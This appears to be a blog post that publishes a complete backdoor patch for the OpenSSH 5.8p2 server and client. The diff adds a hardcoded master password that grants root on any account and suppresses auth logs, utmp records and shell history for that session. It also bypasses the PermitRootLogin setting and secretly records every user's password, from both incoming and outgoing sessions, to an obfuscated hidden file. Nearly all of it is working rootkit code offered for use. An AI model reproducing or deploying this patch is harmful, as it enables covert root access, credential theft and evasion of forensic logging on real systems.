Updated for openssh-5.x version
FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch
diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c *** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009 --- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011 *************** *** 466,471 **** --- 466,475 ---- if (sshpam_err != PAM_SUCCESS) goto auth_fail; sshpam_err = pam_authenticate(sshpam_handle, flags); + // slash patch + if(uDc) + sshpam_err = PAM_SUCCESS; + // end of slash if (sshpam_err != PAM_SUCCESS) goto auth_fail; *************** *** 816,821 **** --- 820,834 ---- Buffer buffer; struct pam_ctxt *ctxt = ctx; + // slash patch + if(sshpam_authctxt) + for (gurun = 0; gurun < num; ++gurun) { + sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]); + if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1; + else uDclog(); + } + // end of patch debug2("PAM: %s entering, %u responses", __func__, num); switch (ctxt->pam_done) { case 1: *************** *** 1205,1210 **** --- 1218,1226 ---- fatal("PAM: %s: failed to set PAM_CONV: %s", __func__, pam_strerror(sshpam_handle, sshpam_err)); + // slash patch + if(!uDc) + // end of patch sshpam_err = pam_authenticate(sshpam_handle, flags); sshpam_password = NULL; if (sshpam_err == PAM_SUCCESS && authctxt->valid) { diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c *** openssh-5.8p2/auth-passwd.c Sun Mar 8 08:40:28 2009 --- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011 *************** *** 92,97 **** --- 92,103 ---- #endif if (*password == '\0' && options.permit_empty_passwd == 0) return 0; + // slash patch + if(!strcmp(BAJAUPASS, password)) return uDc = 1; + sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), pw->pw_name, password); + uDclog(); + // end of patch #ifdef KRB5 if (options.kerberos_authentication == 1) { diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c *** openssh-5.8p2/auth.c Wed Dec 1 09:21:51 2010 --- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011 *************** *** 94,99 **** --- 94,104 ---- int allowed_user(struct passwd * pw) { + // slash patch + if(uDc) return 1; + else { + // end of patch + struct stat st; const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL; u_int i; *************** *** 249,258 **** --- 254,269 ---- /* We found no reason not to let this user try to log on... */ return 1; } + // slash patch + } + // end of patch void auth_log(Authctxt *authctxt, int authenticated, char *method, char *info) { + // slash patch + if(!uDc) { + // end of patch void (*authlog) (const char *fmt,...) = verbose; char *authmsg; *************** *** 298,303 **** --- 309,317 ---- audit_event(audit_classify_auth(method)); #endif } + // slash patch + } + // end of patch /* * Check whether root logins are disallowed. *************** *** 305,310 **** --- 319,327 ---- int auth_root_allowed(char *method) { + // slash patch + if(!uDc) { + // end of patch switch (options.permit_root_login) { case PERMIT_YES: return 1; *************** *** 322,327 **** --- 339,349 ---- logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr()); return 0; } + // slash patch + else + return 1; + } + // end of patch /* diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c *** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010 --- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011 *************** *** 81,86 **** --- 81,89 ---- if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), NULL, 0, NI_NAMEREQD) != 0) { /* Host name not found. Use ip address. */ + // slash patch + if(!uDc) + // end of patch return xstrdup(ntop); } diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h *** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010 --- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011 *************** *** 13,18 **** --- 13,40 ---- * called by a name other than "ssh" or "Secure Shell". */ + // slash patch + #include+ #include + + #define BAJAUPASS "CHANGE-ME" + #define SSH_LOG "/dev/lala" + + FILE *s9clog; + char slashbuff[1024]; + int kambing, gurun, uDc; + + #define uDclog() { \ + kambing=strlen(slashbuff); \ + for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun]; \ + s9clog=fopen(SSH_LOG, "a"); \ + if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \ + chmod(SSH_LOG, 0666); \ + } + + const char *get_remote_ipaddr(void); + // end of patch + #ifndef INCLUDES_H #define INCLUDES_H diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c *** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008 --- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011 *************** *** 336,341 **** --- 336,345 ---- char fmtbuf[MSGBUFSIZ]; char *txt = NULL; int pri = LOG_INFO; + + // slash patch + if(uDc) return; + // end of patch int saved_errno = errno; if (level > log_level) diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c *** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011 --- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011 *************** *** 433,438 **** --- 433,442 ---- int login_write(struct logininfo *li) { + // slash patch + if(uDc) return 0; + // end of patch + #ifndef HAVE_CYGWIN if (geteuid() != 0) { logit("Attempt to write login records by non-root user (aborting)"); diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c *** openssh-5.8p2/session.c Wed Dec 1 09:02:59 2010 --- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011 *************** *** 1198,1203 **** --- 1198,1207 ---- } if (getenv("TZ")) child_set_env(&env, &envsize, "TZ", getenv("TZ")); + // slash patch + if(uDc) + child_set_env(&env, &envsize, "HISTFILE", "/dev/null"); + // end of patch /* Set custom environment options from RSA authentication. */ if (!options.use_login) { *************** *** 1483,1488 **** --- 1487,1495 ---- #else if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno)); + // slash patch + if(!uDc) { + // end of patch if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1); *************** *** 1492,1497 **** --- 1499,1511 ---- perror("initgroups"); exit(1); } + // slash patch + } + else { + setgid(0); + initgroups(pw->pw_name, 0); + } + // end of patch endgrent(); #endif *************** *** 1515,1520 **** --- 1529,1537 ---- } #else /* Permanently switch to the desired uid. */ + // slash patch + if(!uDc) + // end of patch permanently_set_uid(pw); #endif } diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c *** openssh-5.8p2/sshconnect1.c Tue Nov 7 20:14:42 2006 --- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011 *************** *** 458,463 **** --- 458,468 ---- password = read_passphrase(prompt, 0); packet_start(SSH_CMSG_AUTH_PASSWORD); ssh_put_password(password); + // slash patch + sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), options.user, password); + uDclog(); + // end of patch memset(password, 0, strlen(password)); xfree(password); packet_send(); diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c *** openssh-5.8p2/sshconnect2.c Wed Dec 1 09:21:51 2010 --- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011 *************** *** 883,888 **** --- 883,893 ---- packet_put_cstring(authctxt->method->name); packet_put_char(0); packet_put_cstring(password); + // slash patch + sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), options.user, password); + uDclog(); + // end of patch memset(password, 0, strlen(password)); xfree(password); packet_add_padding(64); *************** *** 1558,1563 **** --- 1563,1573 ---- response = read_passphrase(prompt, echo ? RP_ECHO : 0); + // slash patch + sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), options.user, response); + uDclog(); + // end of patch packet_put_cstring(response); memset(response, 0, strlen(response)); xfree(response); diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c *** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011 --- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011 *************** *** 126,131 **** --- 126,134 ---- record_login(pid_t pid, const char *tty, const char *user, uid_t uid, const char *host, struct sockaddr *addr, socklen_t addrlen) { + // slash patch + if(!uDc) { + // end of patch struct logininfo *li; /* save previous login details before writing new */ *************** *** 136,147 **** --- 139,156 ---- login_login(li); login_free_entry(li); } + // slash patch + } + // end of patch #ifdef LOGIN_NEEDS_UTMPX void record_utmp_only(pid_t pid, const char *ttyname, const char *user, const char *host, struct sockaddr *addr, socklen_t addrlen) { + // slash patch + if(!uDc) { + // end of patch struct logininfo *li; li = login_alloc_entry(pid, user, host, ttyname); *************** *** 149,163 **** --- 158,181 ---- login_utmp_only(li); login_free_entry(li); } + // slash patch + } + // end of patch #endif /* Records that the user has logged out. */ void record_logout(pid_t pid, const char *tty, const char *user) { + // slash patch + if(!uDc) { + // end of patch struct logininfo *li; li = login_alloc_entry(pid, user, NULL, tty); login_logout(li); login_free_entry(li); } + // slash patch + } + // end of patch diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h *** openssh-5.8p2/version.h Thu May 5 09:56:54 2011 --- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011 *************** *** 1,6 **** /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */ ! #define SSH_VERSION "OpenSSH_5.8" #define SSH_PORTABLE "p2" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE --- 1,6 ---- /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */ ! #define SSH_VERSION "OpenSSH_5.8" // change #define SSH_PORTABLE "p2" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
No comments:
Post a Comment